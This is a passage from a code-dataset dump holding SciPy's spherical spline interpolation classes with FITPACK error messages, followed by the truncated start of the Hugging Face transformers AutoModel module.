The following\n restrictions must be satisfied:\n -1<=iopt<=1, m>=2, ntest>=8 ,npest >=8, 0<eps<1,\n 0<=teta(i)<=pi, 0<=phi(i)<=2*pi, w(i)>0, i=1,...,m\n lwrk1 >= 185+52*v+10*u+14*u*v+8*(u-1)*v**2+8*m\n kwrk >= m+(ntest-7)*(npest-7)\n if iopt=-1: 8<=nt<=ntest , 9<=np<=npest\n 0<tt(5)<tt(6)<...<tt(nt-4)<pi\n 0<tp(5)<tp(6)<...<tp(np-4)<2*pi\n if iopt>=0: s>=0\n if one of these conditions is found to be violated,control\n is immediately repassed to the calling program. in that\n case there is no approximation returned.\"\"\"\n_spherefit_messages[-3] = \"\"\"\nWARNING. The coefficients of the spline returned have been computed as the\n minimal norm least-squares solution of a (numerically) rank\n deficient system (deficiency=%i, rank=%i). Especially if the rank\n deficiency, which is computed by 6+(nt-8)*(np-7)+ier, is large,\n the results may be inaccurate. They could also seriously depend on\n the value of eps.\"\"\"\n\n\nclass SphereBivariateSpline(_BivariateSplineBase):\n \"\"\"\n Bivariate spline s(x,y) of degrees 3 on a sphere, calculated from a\n given set of data points (theta,phi,r).\n\n .. versionadded:: 0.11.0\n\n See Also\n --------\n bisplrep, bisplev : an older wrapping of FITPACK\n UnivariateSpline : a similar class for univariate spline interpolation\n SmoothUnivariateSpline :\n to create a BivariateSpline through the given points\n LSQUnivariateSpline :\n to create a BivariateSpline using weighted least-squares fitting\n \"\"\"\n\n def __call__(self, theta, phi, dtheta=0, dphi=0, grid=True):\n \"\"\"\n Evaluate the spline or its derivatives at given positions.\n\n Parameters\n ----------\n theta, phi : array_like\n Input coordinates.\n\n If `grid` is False, evaluate the spline at points\n ``(theta[i], phi[i]), i=0, ..., len(x)-1``. Standard\n Numpy broadcasting is obeyed.\n\n If `grid` is True: evaluate spline at the grid points\n defined by the coordinate arrays theta, phi. The arrays\n must be sorted to increasing order.\n dtheta : int, optional\n Order of theta-derivative\n\n .. versionadded:: 0.14.0\n dphi : int\n Order of phi-derivative\n\n .. versionadded:: 0.14.0\n grid : bool\n Whether to evaluate the results on a grid spanned by the\n input arrays, or at points specified by the input arrays.\n\n .. versionadded:: 0.14.0\n\n \"\"\"\n theta = np.asarray(theta)\n phi = np.asarray(phi)\n\n if theta.size > 0 and (theta.min() < 0. or theta.max() > np.pi):\n raise ValueError(\"requested theta out of bounds.\")\n if phi.size > 0 and (phi.min() < 0. or phi.max() > 2. * np.pi):\n raise ValueError(\"requested phi out of bounds.\")\n\n return _BivariateSplineBase.__call__(self, theta, phi,\n dx=dtheta, dy=dphi, grid=grid)\n\n def ev(self, theta, phi, dtheta=0, dphi=0):\n \"\"\"\n Evaluate the spline at points\n\n Returns the interpolated value at ``(theta[i], phi[i]),\n i=0,...,len(theta)-1``.\n\n Parameters\n ----------\n theta, phi : array_like\n Input coordinates. Standard Numpy broadcasting is obeyed.\n dtheta : int, optional\n Order of theta-derivative\n\n .. versionadded:: 0.14.0\n dphi : int, optional\n Order of phi-derivative\n\n .. versionadded:: 0.14.0\n \"\"\"\n return self.__call__(theta, phi, dtheta=dtheta, dphi=dphi, grid=False)\n\n\nclass SmoothSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Smooth bivariate spline approximation in spherical coordinates.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n theta, phi, r : array_like\n 1-D sequences of data points (order is not important). Coordinates\n must be given in radians. 
Theta must lie within the interval (0, pi),\n and phi must lie within the interval (0, 2pi).\n w : array_like, optional\n Positive 1-D sequence of weights.\n s : float, optional\n Positive smoothing factor defined for estimation condition:\n ``sum((w(i)*(r(i) - s(theta(i), phi(i))))**2, axis=0) <= s``\n Default ``s=len(w)`` which should be a good value if 1/w[i] is an\n estimate of the standard deviation of r[i].\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. `eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n Notes\n -----\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/sphere.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid (the input data does not\n have to be on a grid):\n\n >>> theta = np.linspace(0., np.pi, 7)\n >>> phi = np.linspace(0., 2*np.pi, 9)\n >>> data = np.empty((theta.shape[0], phi.shape[0]))\n >>> data[:,0], data[0,:], data[-1,:] = 0., 0., 0.\n >>> data[1:-1,1], data[1:-1,-1] = 1., 1.\n >>> data[1,1:-1], data[-2,1:-1] = 1., 1.\n >>> data[2:-2,2], data[2:-2,-2] = 2., 2.\n >>> data[2,2:-2], data[-3,2:-2] = 2., 2.\n >>> data[3,3:-2] = 3.\n >>> data = np.roll(data, 4, 1)\n\n We need to set up the interpolator object\n\n >>> lats, lons = np.meshgrid(theta, phi)\n >>> from scipy.interpolate import SmoothSphereBivariateSpline\n >>> lut = SmoothSphereBivariateSpline(lats.ravel(), lons.ravel(),\n ... data.T.ravel(), s=3.5)\n\n As a first test, we'll see what the algorithm returns when run on the\n input coordinates\n\n >>> data_orig = lut(theta, phi)\n\n Finally we interpolate the data to a finer grid\n\n >>> fine_lats = np.linspace(0., np.pi, 70)\n >>> fine_lons = np.linspace(0., 2 * np.pi, 90)\n\n >>> data_smth = lut(fine_lats, fine_lons)\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(131)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(132)\n >>> ax2.imshow(data_orig, interpolation='nearest')\n >>> ax3 = fig.add_subplot(133)\n >>> ax3.imshow(data_smth, interpolation='nearest')\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, theta, phi, r, w=None, s=0., eps=1E-16):\n if np.issubclass_(w, float):\n w = ones(len(theta)) * w\n nt_, tt_, np_, tp_, c, fp, ier = dfitpack.spherfit_smth(theta, phi,\n r, w=w, s=s,\n eps=eps)\n if ier not in [0, -1, -2]:\n message = _spherefit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(message)\n\n self.fp = fp\n self.tck = tt_[:nt_], tp_[:np_], c[:(nt_ - 4) * (np_ - 4)]\n self.degrees = (3, 3)\n\n\nclass LSQSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Weighted least-squares bivariate spline approximation in spherical\n coordinates.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n theta, phi, r : array_like\n 1-D sequences of data points (order is not important). Coordinates\n must be given in radians. Theta must lie within the interval (0, pi),\n and phi must lie within the interval (0, 2pi).\n tt, tp : array_like\n Strictly ordered 1-D sequences of knots coordinates.\n Coordinates must satisfy ``0 < tt[i] < pi``, ``0 < tp[i] < 2*pi``.\n w : array_like, optional\n Positive 1-D sequence of weights, of the same length as `theta`, `phi`\n and `r`.\n eps : float, optional\n A threshold for determining the effective rank of an over-determined\n linear system of equations. 
`eps` should have a value between 0 and 1,\n the default is 1e-16.\n\n Notes\n -----\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/sphere.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid (the input data does not\n have to be on a grid):\n\n >>> theta = np.linspace(0., np.pi, 7)\n >>> phi = np.linspace(0., 2*np.pi, 9)\n >>> data = np.empty((theta.shape[0], phi.shape[0]))\n >>> data[:,0], data[0,:], data[-1,:] = 0., 0., 0.\n >>> data[1:-1,1], data[1:-1,-1] = 1., 1.\n >>> data[1,1:-1], data[-2,1:-1] = 1., 1.\n >>> data[2:-2,2], data[2:-2,-2] = 2., 2.\n >>> data[2,2:-2], data[-3,2:-2] = 2., 2.\n >>> data[3,3:-2] = 3.\n >>> data = np.roll(data, 4, 1)\n\n We need to set up the interpolator object. Here, we must also specify the\n coordinates of the knots to use.\n\n >>> lats, lons = np.meshgrid(theta, phi)\n >>> knotst, knotsp = theta.copy(), phi.copy()\n >>> knotst[0] += .0001\n >>> knotst[-1] -= .0001\n >>> knotsp[0] += .0001\n >>> knotsp[-1] -= .0001\n >>> from scipy.interpolate import LSQSphereBivariateSpline\n >>> lut = LSQSphereBivariateSpline(lats.ravel(), lons.ravel(),\n ... data.T.ravel(), knotst, knotsp)\n\n As a first test, we'll see what the algorithm returns when run on the\n input coordinates\n\n >>> data_orig = lut(theta, phi)\n\n Finally we interpolate the data to a finer grid\n\n >>> fine_lats = np.linspace(0., np.pi, 70)\n >>> fine_lons = np.linspace(0., 2*np.pi, 90)\n\n >>> data_lsq = lut(fine_lats, fine_lons)\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(131)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(132)\n >>> ax2.imshow(data_orig, interpolation='nearest')\n >>> ax3 = fig.add_subplot(133)\n >>> ax3.imshow(data_lsq, interpolation='nearest')\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, theta, phi, r, tt, tp, w=None, eps=1E-16):\n if np.issubclass_(w, float):\n w = ones(len(theta)) * w\n nt_, np_ = 8 + len(tt), 8 + len(tp)\n tt_, tp_ = zeros((nt_,), float), zeros((np_,), float)\n tt_[4:-4], tp_[4:-4] = tt, tp\n tt_[-4:], tp_[-4:] = np.pi, 2. * np.pi\n tt_, tp_, c, fp, ier = dfitpack.spherfit_lsq(theta, phi, r, tt_, tp_,\n w=w, eps=eps)\n if ier < -2:\n deficiency = 6 + (nt_ - 8) * (np_ - 7) + ier\n message = _spherefit_messages.get(-3) % (deficiency, -ier)\n warnings.warn(message)\n elif ier not in [0, -1, -2]:\n message = _spherefit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(message)\n\n self.fp = fp\n self.tck = tt_, tp_, c\n self.degrees = (3, 3)\n\n\n_spfit_messages = _surfit_messages.copy()\n_spfit_messages[10] = \"\"\"\nERROR: on entry, the input data are controlled on validity\n the following restrictions must be satisfied.\n -1<=iopt(1)<=1, 0<=iopt(2)<=1, 0<=iopt(3)<=1,\n -1<=ider(1)<=1, 0<=ider(2)<=1, ider(2)=0 if iopt(2)=0.\n -1<=ider(3)<=1, 0<=ider(4)<=1, ider(4)=0 if iopt(3)=0.\n mu >= mumin (see above), mv >= 4, nuest >=8, nvest >= 8,\n kwrk>=5+mu+mv+nuest+nvest,\n lwrk >= 12+nuest*(mv+nvest+3)+nvest*24+4*mu+8*mv+max(nuest,mv+nvest)\n 0< u(i-1)<u(i)< pi,i=2,..,mu,\n -pi<=v(1)< pi, v(1)<v(i-1)<v(i)<v(1)+2*pi, i=3,...,mv\n if iopt(1)=-1: 8<=nu<=min(nuest,mu+6+iopt(2)+iopt(3))\n 0<tu(5)<tu(6)<...<tu(nu-4)< pi\n 8<=nv<=min(nvest,mv+7)\n v(1)<tv(5)<tv(6)<...<tv(nv-4)<v(1)+2*pi\n the schoenberg-whitney conditions, i.e. 
there must be\n subset of grid co-ordinates uu(p) and vv(q) such that\n tu(p) < uu(p) < tu(p+4) ,p=1,...,nu-4\n (iopt(2)=1 and iopt(3)=1 also count for a uu-value\n tv(q) < vv(q) < tv(q+4) ,q=1,...,nv-4\n (vv(q) is either a value v(j) or v(j)+2*pi)\n if iopt(1)>=0: s>=0\n if s=0: nuest>=mu+6+iopt(2)+iopt(3), nvest>=mv+7\n if one of these conditions is found to be violated,control is\n immediately repassed to the calling program. in that case there is no\n approximation returned.\"\"\"\n\n\nclass RectSphereBivariateSpline(SphereBivariateSpline):\n \"\"\"\n Bivariate spline approximation over a rectangular mesh on a sphere.\n\n Can be used for smoothing data.\n\n .. versionadded:: 0.11.0\n\n Parameters\n ----------\n u : array_like\n 1-D array of latitude coordinates in strictly ascending order.\n Coordinates must be given in radians and lie within the interval\n (0, pi).\n v : array_like\n 1-D array of longitude coordinates in strictly ascending order.\n Coordinates must be given in radians, and must lie within (0, 2pi).\n r : array_like\n 2-D array of data with shape ``(u.size, v.size)``.\n s : float, optional\n Positive smoothing factor defined for estimation condition\n (``s=0`` is for interpolation).\n pole_continuity : bool or (bool, bool), optional\n Order of continuity at the poles ``u=0`` (``pole_continuity[0]``) and\n ``u=pi`` (``pole_continuity[1]``). The order of continuity at the pole\n will be 1 or 0 when this is True or False, respectively.\n Defaults to False.\n pole_values : float or (float, float), optional\n Data values at the poles ``u=0`` and ``u=pi``. Either the whole\n parameter or each individual element can be None. Defaults to None.\n pole_exact : bool or (bool, bool), optional\n Data value exactness at the poles ``u=0`` and ``u=pi``. If True, the\n value is considered to be the right function value, and it will be\n fitted exactly. If False, the value will be considered to be a data\n value just like the other data values. Defaults to False.\n pole_flat : bool or (bool, bool), optional\n For the poles at ``u=0`` and ``u=pi``, specify whether or not the\n approximation has vanishing derivatives. Defaults to False.\n\n See Also\n --------\n RectBivariateSpline : bivariate spline approximation over a rectangular\n mesh\n\n Notes\n -----\n Currently, only the smoothing spline approximation (``iopt[0] = 0`` and\n ``iopt[0] = 1`` in the FITPACK routine) is supported. The exact\n least-squares spline approximation is not implemented yet.\n\n When actually performing the interpolation, the requested `v` values must\n lie within the same length 2pi interval that the original `v` values were\n chosen from.\n\n For more information, see the FITPACK_ site about this function.\n\n .. _FITPACK: http://www.netlib.org/dierckx/spgrid.f\n\n Examples\n --------\n Suppose we have global data on a coarse grid\n\n >>> lats = np.linspace(10, 170, 9) * np.pi / 180.\n >>> lons = np.linspace(0, 350, 18) * np.pi / 180.\n >>> data = np.dot(np.atleast_2d(90. - np.linspace(-80., 80., 18)).T,\n ... np.atleast_2d(180. - np.abs(np.linspace(0., 350., 9)))).T\n\n We want to interpolate it to a global one-degree grid\n\n >>> new_lats = np.linspace(1, 180, 180) * np.pi / 180\n >>> new_lons = np.linspace(1, 360, 360) * np.pi / 180\n >>> new_lats, new_lons = np.meshgrid(new_lats, new_lons)\n\n We need to set up the interpolator object\n\n >>> from scipy.interpolate import RectSphereBivariateSpline\n >>> lut = RectSphereBivariateSpline(lats, lons, data)\n\n Finally we interpolate the data. 
The `RectSphereBivariateSpline` object\n only takes 1-D arrays as input, therefore we need to do some reshaping.\n\n >>> data_interp = lut.ev(new_lats.ravel(),\n ... new_lons.ravel()).reshape((360, 180)).T\n\n Looking at the original and the interpolated data, one can see that the\n interpolant reproduces the original data very well:\n\n >>> import matplotlib.pyplot as plt\n >>> fig = plt.figure()\n >>> ax1 = fig.add_subplot(211)\n >>> ax1.imshow(data, interpolation='nearest')\n >>> ax2 = fig.add_subplot(212)\n >>> ax2.imshow(data_interp, interpolation='nearest')\n >>> plt.show()\n\n Chosing the optimal value of ``s`` can be a delicate task. Recommended\n values for ``s`` depend on the accuracy of the data values. If the user\n has an idea of the statistical errors on the data, she can also find a\n proper estimate for ``s``. By assuming that, if she specifies the\n right ``s``, the interpolator will use a spline ``f(u,v)`` which exactly\n reproduces the function underlying the data, she can evaluate\n ``sum((r(i,j)-s(u(i),v(j)))**2)`` to find a good estimate for this ``s``.\n For example, if she knows that the statistical errors on her\n ``r(i,j)``-values are not greater than 0.1, she may expect that a good\n ``s`` should have a value not larger than ``u.size * v.size * (0.1)**2``.\n\n If nothing is known about the statistical error in ``r(i,j)``, ``s`` must\n be determined by trial and error. The best is then to start with a very\n large value of ``s`` (to determine the least-squares polynomial and the\n corresponding upper bound ``fp0`` for ``s``) and then to progressively\n decrease the value of ``s`` (say by a factor 10 in the beginning, i.e.\n ``s = fp0 / 10, fp0 / 100, ...`` and more carefully as the approximation\n shows more detail) to obtain closer fits.\n\n The interpolation results for different values of ``s`` give some insight\n into this process:\n\n >>> fig2 = plt.figure()\n >>> s = [3e9, 2e9, 1e9, 1e8]\n >>> for ii in xrange(len(s)):\n ... lut = RectSphereBivariateSpline(lats, lons, data, s=s[ii])\n ... data_interp = lut.ev(new_lats.ravel(),\n ... new_lons.ravel()).reshape((360, 180)).T\n ... ax = fig2.add_subplot(2, 2, ii+1)\n ... ax.imshow(data_interp, interpolation='nearest')\n ... 
ax.set_title(\"s = %g\" % s[ii])\n >>> plt.show()\n\n \"\"\"\n\n def __init__(self, u, v, r, s=0., pole_continuity=False, pole_values=None,\n pole_exact=False, pole_flat=False):\n iopt = np.array([0, 0, 0], dtype=int)\n ider = np.array([-1, 0, -1, 0], dtype=int)\n if pole_values is None:\n pole_values = (None, None)\n elif isinstance(pole_values, (float, np.float32, np.float64)):\n pole_values = (pole_values, pole_values)\n if isinstance(pole_continuity, bool):\n pole_continuity = (pole_continuity, pole_continuity)\n if isinstance(pole_exact, bool):\n pole_exact = (pole_exact, pole_exact)\n if isinstance(pole_flat, bool):\n pole_flat = (pole_flat, pole_flat)\n\n r0, r1 = pole_values\n iopt[1:] = pole_continuity\n if r0 is None:\n ider[0] = -1\n else:\n ider[0] = pole_exact[0]\n\n if r1 is None:\n ider[2] = -1\n else:\n ider[2] = pole_exact[1]\n\n ider[1], ider[3] = pole_flat\n\n u, v = np.ravel(u), np.ravel(v)\n if not np.all(np.diff(u) > 0.0):\n raise TypeError('u must be strictly increasing')\n if not np.all(np.diff(v) > 0.0):\n raise TypeError('v must be strictly increasing')\n\n if not u.size == r.shape[0]:\n raise TypeError('u dimension of r must have same number of '\n 'elements as u')\n if not v.size == r.shape[1]:\n raise TypeError('v dimension of r must have same number of '\n 'elements as v')\n\n if pole_continuity[1] is False and pole_flat[1] is True:\n raise TypeError('if pole_continuity is False, so must be '\n 'pole_flat')\n if pole_continuity[0] is False and pole_flat[0] is True:\n raise TypeError('if pole_continuity is False, so must be '\n 'pole_flat')\n\n r = np.ravel(r)\n nu, tu, nv, tv, c, fp, ier = dfitpack.regrid_smth_spher(iopt, ider,\n u.copy(), v.copy(), r.copy(), r0, r1, s)\n\n if ier not in [0, -1, -2]:\n msg = _spfit_messages.get(ier, 'ier=%s' % (ier))\n raise ValueError(msg)\n\n self.fp = fp\n self.tck = tu[:nu], tv[:nv], c[:(nu - 4) * (nv-4)]\n self.degrees = (3, 3)\n"} {"ext": "py", "sha": "1a30ea46239fd94a37b77ac11726303b6c87fcbb", "content": "# coding=utf-8\n# Copyright 2018 The HuggingFace Inc. team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Auto Model class. 
\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\n\nfrom .modeling_bert import BertModel, BertForMaskedLM, BertForSequenceClassification, BertForQuestionAnswering, BERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_openai import OpenAIGPTModel, OpenAIGPTLMHeadModel, OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_gpt2 import GPT2Model, GPT2LMHeadModel, GPT2_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_ctrl import CTRLModel, CTRLLMHeadModel, CTRL_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_transfo_xl import TransfoXLModel, TransfoXLLMHeadModel, TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_xlnet import XLNetModel, XLNetLMHeadModel, XLNetForSequenceClassification, XLNetForQuestionAnswering, XLNET_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_xlm import XLMModel, XLMWithLMHeadModel, XLMForSequenceClassification, XLMForQuestionAnswering, XLM_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_roberta import RobertaModel, RobertaForMaskedLM, RobertaForSequenceClassification, ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_distilbert import DistilBertModel, DistilBertForQuestionAnswering, DistilBertForMaskedLM, DistilBertForSequenceClassification, DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_camembert import CamembertModel, CamembertForMaskedLM, CamembertForSequenceClassification, CamembertForMultipleChoice, CAMEMBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_albert import AlbertModel, AlbertForMaskedLM, AlbertForSequenceClassification, AlbertForQuestionAnswering, ALBERT_PRETRAINED_MODEL_ARCHIVE_MAP\nfrom .modeling_t5 import T5Model, T5WithLMHeadModel, T5_PRETRAINED_MODEL_ARCHIVE_MAP\n\nfrom .modeling_utils import PreTrainedModel, SequenceSummary\n\nfrom .file_utils import add_start_docstrings\n\nlogger = logging.getLogger(__name__)\n\n\nALL_PRETRAINED_MODEL_ARCHIVE_MAP = dict((key, value)\n for pretrained_map in [\n BERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n OPENAI_GPT_PRETRAINED_MODEL_ARCHIVE_MAP,\n TRANSFO_XL_PRETRAINED_MODEL_ARCHIVE_MAP,\n GPT2_PRETRAINED_MODEL_ARCHIVE_MAP,\n CTRL_PRETRAINED_MODEL_ARCHIVE_MAP,\n XLNET_PRETRAINED_MODEL_ARCHIVE_MAP,\n XLM_PRETRAINED_MODEL_ARCHIVE_MAP,\n ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP,\n DISTILBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n ALBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n CAMEMBERT_PRETRAINED_MODEL_ARCHIVE_MAP,\n T5_PRETRAINED_MODEL_ARCHIVE_MAP,\n ]\n for key, value, in pretrained_map.items())\n\n\nclass AutoModel(object):\n r\"\"\"\n :class:`~transformers.AutoModel` is a generic model class\n that will be instantiated as one of the base model classes of the library\n when created with the `AutoModel.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The base model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5Model (T5 model)\n - contains `distilbert`: DistilBertModel (DistilBERT model)\n - contains `albert`: AlbertModel (ALBERT model)\n - contains `camembert`: CamembertModel (CamemBERT model)\n - contains `roberta`: RobertaModel (RoBERTa model)\n - contains `bert`: BertModel (Bert model)\n - contains `openai-gpt`: OpenAIGPTModel (OpenAI GPT model)\n - contains `gpt2`: GPT2Model (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLModel (Transformer-XL model)\n - contains `xlnet`: 
XLNetModel (XLNet model)\n - contains `xlm`: XLMModel (XLM model)\n - contains `ctrl`: CTRLModel (Salesforce CTRL model)\n\n This class cannot be instantiated using `__init__()` (throws an error).\n \"\"\"\n def __init__(self):\n raise EnvironmentError(\"AutoModel is designed to be instantiated \"\n \"using the `AutoModel.from_pretrained(pretrained_model_name_or_path)` method.\")\n\n @classmethod\n def from_pretrained(cls, pretrained_model_name_or_path, *model_args, **kwargs):\n r\"\"\" Instantiates one of the base model classes of the library\n from a pre-trained model configuration.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5Model (T5 model)\n - contains `distilbert`: DistilBertModel (DistilBERT model)\n - contains `albert`: AlbertModel (ALBERT model)\n - contains `camembert`: CamembertModel (CamemBERT model)\n - contains `roberta`: RobertaModel (RoBERTa model)\n - contains `bert`: BertModel (Bert model)\n - contains `openai-gpt`: OpenAIGPTModel (OpenAI GPT model)\n - contains `gpt2`: GPT2Model (OpenAI GPT-2 model)\n - contains `transfo-xl`: TransfoXLModel (Transformer-XL model)\n - contains `xlnet`: XLNetModel (XLNet model)\n - contains `xlm`: XLMModel (XLM model)\n - contains `ctrl`: CTRLModel (Salesforce CTRL model)\n\n The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated)\n To train the model, you should first set it back in training mode with `model.train()`\n\n Params:\n pretrained_model_name_or_path: either:\n\n - a string with the `shortcut name` of a pre-trained model to load from cache or download, e.g.: ``bert-base-uncased``.\n - a string with the `identifier name` of a pre-trained model that was user-uploaded to our S3, e.g.: ``dbmdz/bert-base-german-cased``.\n - a path to a `directory` containing model weights saved using :func:`~transformers.PreTrainedModel.save_pretrained`, e.g.: ``./my_model_directory/``.\n - a path or url to a `tensorflow index checkpoint file` (e.g. `./tf_model/model.ckpt.index`). In this case, ``from_tf`` should be set to True and a configuration object should be provided as ``config`` argument. This loading path is slower than converting the TensorFlow checkpoint in a PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.\n\n model_args: (`optional`) Sequence of positional arguments:\n All remaning positional arguments will be passed to the underlying model's ``__init__`` method\n\n config: (`optional`) instance of a class derived from :class:`~transformers.PretrainedConfig`:\n Configuration for the model to use instead of an automatically loaded configuation. 
Configuration can be automatically loaded when:\n\n - the model is a model provided by the library (loaded with the ``shortcut-name`` string of a pretrained model), or\n - the model was saved using :func:`~transformers.PreTrainedModel.save_pretrained` and is reloaded by suppling the save directory.\n - the model is loaded by suppling a local directory as ``pretrained_model_name_or_path`` and a configuration JSON file named `config.json` is found in the directory.\n\n state_dict: (`optional`) dict:\n an optional state dictionnary for the model to use instead of a state dictionary loaded from saved weights file.\n This option can be used if you want to create a model from a pretrained configuration but load your own weights.\n In this case though, you should check if using :func:`~transformers.PreTrainedModel.save_pretrained` and :func:`~transformers.PreTrainedModel.from_pretrained` is not a simpler option.\n\n cache_dir: (`optional`) string:\n Path to a directory in which a downloaded pre-trained model\n configuration should be cached if the standard cache should not be used.\n\n force_download: (`optional`) boolean, default False:\n Force to (re-)download the model weights and configuration files and override the cached versions if they exists.\n\n resume_download: (`optional`) boolean, default False:\n Do not delete incompletely recieved file. Attempt to resume the download if such a file exists.\n\n proxies: (`optional`) dict, default None:\n A dictionary of proxy servers to use by protocol or endpoint, e.g.: {'http': 'foo.bar:3128', 'http://hostname': 'foo.bar:4012'}.\n The proxies are used on each request.\n\n output_loading_info: (`optional`) boolean:\n Set to ``True`` to also return a dictionnary containing missing keys, unexpected keys and error messages.\n\n kwargs: (`optional`) Remaining dictionary of keyword arguments:\n Can be used to update the configuration object (after it being loaded) and initiate the model. (e.g. ``output_attention=True``). Behave differently depending on whether a `config` is provided or automatically loaded:\n\n - If a configuration is provided with ``config``, ``**kwargs`` will be directly passed to the underlying model's ``__init__`` method (we assume all relevant updates to the configuration have already been done)\n - If a configuration is not provided, ``kwargs`` will be first passed to the configuration class initialization function (:func:`~transformers.PretrainedConfig.from_pretrained`). Each key of ``kwargs`` that corresponds to a configuration attribute will be used to override said attribute with the supplied ``kwargs`` value. Remaining keys that do not correspond to any configuration attribute will be passed to the underlying model's ``__init__`` function.\n\n Examples::\n\n model = AutoModel.from_pretrained('bert-base-uncased') # Download model and configuration from S3 and cache.\n model = AutoModel.from_pretrained('./test/bert_model/') # E.g. 
model was saved using `save_pretrained('./test/saved_model/')`\n model = AutoModel.from_pretrained('bert-base-uncased', output_attention=True) # Update configuration during loading\n assert model.config.output_attention == True\n # Loading from a TF checkpoint file instead of a PyTorch model (slower)\n config = AutoConfig.from_json_file('./tf_model/bert_tf_model_config.json')\n model = AutoModel.from_pretrained('./tf_model/bert_tf_checkpoint.ckpt.index', from_tf=True, config=config)\n\n \"\"\"\n if 't5' in pretrained_model_name_or_path:\n return T5Model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'distilbert' in pretrained_model_name_or_path:\n return DistilBertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'albert' in pretrained_model_name_or_path:\n return AlbertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'camembert' in pretrained_model_name_or_path:\n return CamembertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'roberta' in pretrained_model_name_or_path:\n return RobertaModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'bert' in pretrained_model_name_or_path:\n return BertModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'openai-gpt' in pretrained_model_name_or_path:\n return OpenAIGPTModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'gpt2' in pretrained_model_name_or_path:\n return GPT2Model.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'transfo-xl' in pretrained_model_name_or_path:\n return TransfoXLModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlnet' in pretrained_model_name_or_path:\n return XLNetModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'xlm' in pretrained_model_name_or_path:\n return XLMModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n elif 'ctrl' in pretrained_model_name_or_path:\n return CTRLModel.from_pretrained(pretrained_model_name_or_path, *model_args, **kwargs)\n raise ValueError(\"Unrecognized model identifier in {}. 
Should contains one of \"\n \"'bert', 'openai-gpt', 'gpt2', 'transfo-xl', 'xlnet', \"\n \"'xlm', 'roberta, 'ctrl', 'distilbert', 'camembert', 'albert'\".format(pretrained_model_name_or_path))\n\n\nclass AutoModelWithLMHead(object):\n r\"\"\"\n :class:`~transformers.AutoModelWithLMHead` is a generic model class\n that will be instantiated as one of the language modeling model classes of the library\n when created with the `AutoModelWithLMHead.from_pretrained(pretrained_model_name_or_path)`\n class method.\n\n The `from_pretrained()` method takes care of returning the correct model class instance\n using pattern matching on the `pretrained_model_name_or_path` string.\n\n The model class to instantiate is selected as the first pattern matching\n in the `pretrained_model_name_or_path` string (in the following order):\n - contains `t5`: T5ModelWithLMHead (T5 model)\n - contains `distilbert`: DistilBertForMaskedLM (DistilBERT model)\n - contains `albert`: AlbertForMaskedLM (ALBERT model)\n - contains `camembert`: CamembertForMaskedLM (CamemBERT model)\n - contains `roberta`: RobertaForMaskedLM (RoBERTa model)\n - contains 